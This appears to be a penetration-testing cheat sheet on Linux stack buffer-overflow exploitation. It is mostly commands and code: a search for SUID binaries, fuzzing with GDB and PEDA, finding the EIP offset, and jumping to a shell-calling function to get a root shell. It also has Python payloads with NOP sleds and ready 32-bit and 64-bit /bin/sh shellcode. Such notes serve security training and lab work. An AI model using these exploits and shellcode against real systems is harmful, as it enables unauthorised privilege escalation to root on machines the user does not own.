Linux

Analyse ELF

1
# Find SUID
2
find / -perm -u=s -type f 2>/dev/null
3
​
4
# Analyse
5
file <program>
6
ltrace <program>
7
strings <program>
8
checksec
Copied!

Install GDB and PEDA

1
sudo apt-get install gdb
2
ulimit -c unlimited
3
​
4
# if cores arent being created use below as root
5
echo "core" > /proc/sys/kernel/core_pattern
6
​
7
# Install PEDA
8
git clone https://github.com/longld/peda.git ~/peda
9
echo "source ~/peda/peda.py" >> ~/.gdbinit
10
​
11
# Find program vulnerable to buffer overflow
12
# Create buffer
13
python -c 'print "A"*2000' > 2k.txt
14
​
15
# Pipe buffer to program
16
cat 2k.txt | ./vulnerableprogram
17
​
18
# If crashes a core should be dumped
19
​
20
# Analyse core
21
gdb -q vulnerableprogram ./core
Copied!

GDB Shortcuts

1
b = breakpoint
2
c = continue
3
disas = disasemble
4
x/s = hexadecimal string at address
5
x/40wx $esp-0x200 = hexadecimal 40 words in hex of $esp register - 200 bytes
6
​
7
info functions
8
info registers
Copied!

Find Offset

1
# Open Core
2
gcb -q vulnerableprogram ./core
3
​
4
# View available options
5
help pattern
6
​
7
# Create pattern with unique strings to find overflow
8
pattern create 2000 pattern.txt
9
​
10
# Run pattern without leaving gdb
11
run < pattern.txt
12
​
13
# can also do 'pattern_create 2000' which will print to screen
14
# can then use 'run "pattern"' to execute
15
​
16
# Will show the memory address that fails (e.g 0x41426e41 in ??))
17
# Find offset of that address within gdb
18
pattern offset 0x<address>
19
​
20
# Quit gdb
21
quit
22
​
23
# Will give us bytes for offset, create an overflow that goes to that address
24
python -c 'print "A"*<offsetbytes> + "BBBB"' > eip.txt
25
​
26
# Go back into GDB
27
gdb -q vulnerableprogram ./core
28
​
29
# Run EIP
30
run < eip.txt
31
​
32
# Should now see all BBBB so we can write to the correct location
33
# Quit GDB
Copied!

Find Functions

1
# Open new GDB
2
gdb -q vulnerableprogram
3
​
4
# List functions within gdb
5
info functions
6
​
7
# Look for non standard functions
8
# Analyse them
9
disas <function>
10
e.g. disas main
11
​
12
# Instruction directly before system call is a string, analyse the string
13
# Push <address1>
14
# call <address2> <[email protected]>
15
x/s <address1>
Copied!

Function calling shell on SUID

1
# If the string above is a call to a shell and its a suid program
2
# Then this function can be used for a root shell
3
​
4
# Write the buffer with the address of the start of the function
5
# This has to be little endian and is the function entry point
6
# In the below the entry point was 0x080484cb
7
​
8
python -c 'print "A"*<offsetbytes> + "\xcb\x84\x04\x08"'> root.txt
9
​
10
# Launch GDB
11
gdb -q vulnerableprogram
12
​
13
# Run exploit
14
run < root.txt
15
​
16
# May see shell spawn but die instantly. This is due to SDTIN Closing early.
17
# Can bypass with piping input to SUID program like below
18
(cat root.txt; cat) | ./vulnerableprogram
19
​
20
# This should keep it open
21
# If dev has been done on a copy in a writeable location, now point to live
22
​
23
(cat root.txt; cat) | /home/xdev/Desktop/vulnerableprogramsuid
24
​
25
# Prove root shell
26
id
27
whoami
28
​
29
# Spawn full TTY
30
python -c 'import pty;pty.spawn("/bin/sh")'
Copied!

Python

1
# Run python in GDB
2
run `python exploit.py`
3
​
4
# python script has sc and buffers / nops etc
5
​
6
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
7
payload = "\x90"*50 # NOP Sled
8
payload += sc # Add shellcode
9
payload += "A"*(390-50-len(sc)) # Fill buffer - nop - shellcode
10
payload += "\xe0\xf2\xff\xbf" # EIP = 0xbffff2c0
11
​
12
print payload
13
​
14
# Above spawns a bash shell. (values change obvs)
15
​
16
# EIP might need changing outside of GDB due to environment variable changes.
17
# If so run program like below
18
./program `python exploit.py`
19
​
20
# open dump
21
gdb -q ./program ./core
22
​
23
# debug
24
x/40wx $esp-0x200
25
​
26
# Look for the old EIP and if its still valid. Choose a new one in the NOP sled
Copied!

64 Bit

1
# Look into registers more
2
# ESP changes to RSP
3
# EIP changes to RIP
Copied!
Code below is an example in 64bit using a stack overflow to call /bin/sh
1
from struct import pack
2
​
3
buf = ""
4
buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
5
buf += "\xef\xff\xff\xff\x48\xbb\xfc\x4e\xe5\x0e\x7e\x6b\xa5"
6
buf += "\x19\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
7
buf += "\x96\x75\xbd\x97\x36\xd0\x8a\x7b\x95\x20\xca\x7d\x16"
8
buf += "\x6b\xf6\x51\x75\xa9\x8d\x23\x1d\x6b\xa5\x51\x75\xa8"
9
buf += "\xb7\xe6\x76\x6b\xa5\x19\xd3\x2c\x8c\x60\x51\x18\xcd"
10
buf += "\x19\xaa\x19\xad\x87\x98\x64\xa0\x19"
11
​
12
payload = "\x90"*40 #NOP Sled
13
payload += buf # Shellcode
14
payload += "A"*(128-len(buf)) #Padding to fill out buffer
15
payload += pack("<Q", 0x7fffffffe418) #Setting return address to one in NOP sled
16
​
17
print payload
Copied!
​
Last modified 6mo ago